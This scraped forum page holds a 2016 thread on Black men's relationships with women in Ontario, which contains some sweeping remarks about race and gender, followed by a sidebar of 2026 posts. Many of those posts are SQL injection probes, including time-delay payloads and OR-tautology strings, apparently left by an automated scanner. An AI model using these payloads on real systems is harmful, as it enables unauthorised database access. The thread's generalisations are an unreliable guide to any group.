rELATIVE TO wOMEN.......

04 Feb 2016 05:57 #290364 by mapoui
HOW MUST A bLACK MAN LIVE    ::confused:: ::confused:: ::confused:: ::confused::

04 Feb 2016 11:32 #290403 by ketchim
ramesh is a well appointed Afro Guyanese.

monogamy , one marriage belief  "til death do us part"

Good Christian values.

and a son that is getting both Parents care and guidance !

ramesh and his nuclear family should be a Model for black people !

04 Feb 2016 11:40 #290404 by ketchim
Just as Mapoui and his 2 children !

Together with Wife until death (may Allah light up and widen her grave)

2 university educated children (boy and a girl)

Owners of their own real estate.

while a single and somtimes lonely Mapoui becomes a Landlord with many holdings !!

Black people everywhere should  aspire to emulate this Afro Trini !

04 Feb 2016 11:58 #290407 by ketchim

JUST LIKE YOU !  8)

04 Feb 2016 12:20 #290411 by The Captain
him doan wan no afro oman tek he $$$

04 Feb 2016 13:24 #290419 by ketchim

This is how all Black men should invite a Lady over to their home  8)

MINUS the pork bellies !

04 Feb 2016 16:10 #290435 by mapoui
pork and beans.....nice.

I used to be afraid of pork.  but i studied swine in Agriculture and where I worked we grew them in quantity...all clean.  now I know how to do so even better, safer.  we have bred all the problems out out man.  and I can go even further.

but I see what you mean...I understand.  I wont even talk abut swine again given so many muslims on the board..and more I am sure who are not muslim but who are not enamored of pork.

but that meal was for my kids and a few friends.

I also made some cod fish cakes. that went down real well

04 Feb 2016 16:14 #290436 by mapoui
the purpose of this thread was to scare up a debate about the relationship of black men, and women in general in the society..here in Ontario

I said some things recently that were real, true but hard, tuff..equal to the reality I live.  I don't know if others here appreciated my comments...so I want to take it further, to see what else more we could develop on the issue.

I think its a quite difficult reality for Black men to cope with..though I am sure they all ge some female attention at some point, no matter what it cost.  but I am quite sure that in just about every instance it is expensive :-[ :-[ :-[

05 Feb 2016 15:17 #290549 by ketchim
everyone keeps missing yuh point  ::LOL::

05 Feb 2016 15:47 #290562 by The Captain
what relationship

Time to create page: 0.195 seconds
TristonAn East Canje, Berbice man was on Thursday remanded to prison after being charged with the attempted murder of his former lover, whom he is accused of shooting.

The accused, Damion Morgan, 28, of Fort Ordinance, East Canje, Berbice, appeared at the New Amsterdam Magistrate’s Court, where he was charged with attempted murder and discharging a loaded firearm with intent, committed against Vasanti Gordon of Islington Village, East Bank Berbice.
(23.04.2026, 18:18)(18:18)0
TristonWest Indies Championship… Harpy Eagles begin title defence with win, Scorpions shock Pride(16.04.2026, 19:28)(19:28)0
TristonMichigan installed as early favorite over UConn in national title game despite Lendeborg injury(05.04.2026, 12:52)(12:52)0
TristonSouth Carolina meets UCLA in NCAA women’s title game seeking a 4th title as Bruins chase their 1st(05.04.2026, 11:58)(11:58)0
TristonJudge halts Trump effort requiring colleges to show they aren’t considering race in admissions(05.04.2026, 11:57)(11:57)0
ChanningExxonMobil Guyana President says Guyanese now make up 70% of oil workforce(22.03.2026, 18:57)(18:57)0
ketchimDhall and Rice !(13.03.2026, 13:41)(13:41)0
AlecWhat food instantly reminds you of home?(10.03.2026, 18:59)(18:59)0
ketchimWorld Cup T20 Umpire cheat us on Hettie LBW(05.03.2026, 19:01)(19:01)0
ketchimIndia win Semi FinalT20 World Cup by 7 runs vs. England !(05.03.2026, 13:43)(13:43)0
RolandAn Alabama circuit judge on Monday denied Alabama basketball player Charles Bediako’s motion for a preliminary injunction, ending the 7-foot center’s collegiate eligibility and his season with the Crimson Tide.(10.02.2026, 12:32)(12:32)0
JacquelineICC travel to Pakistan and Game will Play !(10.02.2026, 11:24)(11:24)0
JosephineSeattle opened as favorites, and they've earned that right, with fantastic play on both sides of the ball. We are leaning in their direction in what should be a high-scoring Super Bowl.(03.02.2026, 19:05)(19:05)0
MaleahBREAKING: The government of Pakistan has said that Pakistan will boycott their T20 World Cup match against India(01.02.2026, 12:02)(12:02)0
ketchimGot Florida Hass theodday from my buddy visiting here !(22.01.2026, 20:37)(20:37)0
ketchimICC tell Bangladseh they will be REPLACED !(22.01.2026, 20:17)(20:17)0
(07.01.2026, 14:14)(14:14)1
MaleahNow that Joe Root has 2 centuries in Australia, I assume those Australian fans, who said he couldn’t be classed as great unless he achieved that, will now say he is?? Given that the great Steve Smith has never scored a test ton in Pakistan….(05.01.2026, 13:31)(13:31)0

(04.01.2026, 15:18)(15:18)0
Gwen20(03.01.2026, 14:42)(14:42)0
Gwen(select 198766*667891 from DUAL)(03.01.2026, 14:42)(14:42)0
Gwen(select 198766*667891)(03.01.2026, 14:42)(14:42)0
Gwen@@iBQ3X(03.01.2026, 14:42)(14:42)0
Gwen20'"(03.01.2026, 14:42)(14:42)0
Gwen20(03.01.2026, 14:42)(14:42)0
Gwen20'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'(03.01.2026, 14:42)(14:42)0
Johan20(03.01.2026, 14:42)(14:42)0
Gwen20*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)(03.01.2026, 14:41)(14:41)0
Gwen20F4owsBb6')) OR 756=(SELECT 756 FROM PG_SLEEP(15))--(03.01.2026, 14:41)(14:41)0
Gwen20axQfaI3h') OR 505=(SELECT 505 FROM PG_SLEEP(15))--(03.01.2026, 14:40)(14:40)0
Gwen20GCVWFMgw' OR 960=(SELECT 960 FROM PG_SLEEP(15))--(03.01.2026, 14:40)(14:40)0
Gwen20-1)) OR 426=(SELECT 426 FROM PG_SLEEP(15))--(03.01.2026, 14:39)(14:39)0
Gwen20-1) OR 573=(SELECT 573 FROM PG_SLEEP(15))--(03.01.2026, 14:39)(14:39)0
Gwen20-1 OR 604=(SELECT 604 FROM PG_SLEEP(15))--(03.01.2026, 14:38)(14:38)0
Gwen20ZWzru47i'; waitfor delay '0:0:15' --(03.01.2026, 14:38)(14:38)0
Gwen20-1 waitfor delay '0:0:15' --(03.01.2026, 14:38)(14:38)0
Gwen20-1); waitfor delay '0:0:15' --(03.01.2026, 14:37)(14:37)0
Gwen20-1; waitfor delay '0:0:15' --(03.01.2026, 14:36)(14:36)0
Gwen(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/(03.01.2026, 14:36)(14:36)0
Gwen200"XOR(20*if(now()=sysdate(),sleep(15),0))XOR"Z(03.01.2026, 14:36)(14:36)0
Gwen200'XOR(20*if(now()=sysdate(),sleep(15),0))XOR'Z(03.01.2026, 14:35)(14:35)0
Gwen20*if(now()=sysdate(),sleep(15),0)(03.01.2026, 14:35)(14:35)0
Gwen-1" OR 18=18 or "FwfsM7AR"="(03.01.2026, 14:34)(14:34)0
Gwen-1" OR 3*2<5 or "FwfsM7AR"="(03.01.2026, 14:34)(14:34)0
Gwen-1" OR 5*5=26 or "FwfsM7AR"="(03.01.2026, 14:34)(14:34)0
Gwen-1" OR 5*5=25 or "FwfsM7AR"="(03.01.2026, 14:34)(14:34)0
Gwen-1' OR 641=641 or 'eESQ4mw4'='(03.01.2026, 14:34)(14:34)0
Gwen-1' OR 3*2<5 or 'eESQ4mw4'='(03.01.2026, 14:34)(14:34)0
Gwen-1' OR 5*5=26 or 'eESQ4mw4'='(03.01.2026, 14:34)(14:34)0
Gwen-1' OR 5*5=25 or 'eESQ4mw4'='(03.01.2026, 14:34)(14:34)0
Amelie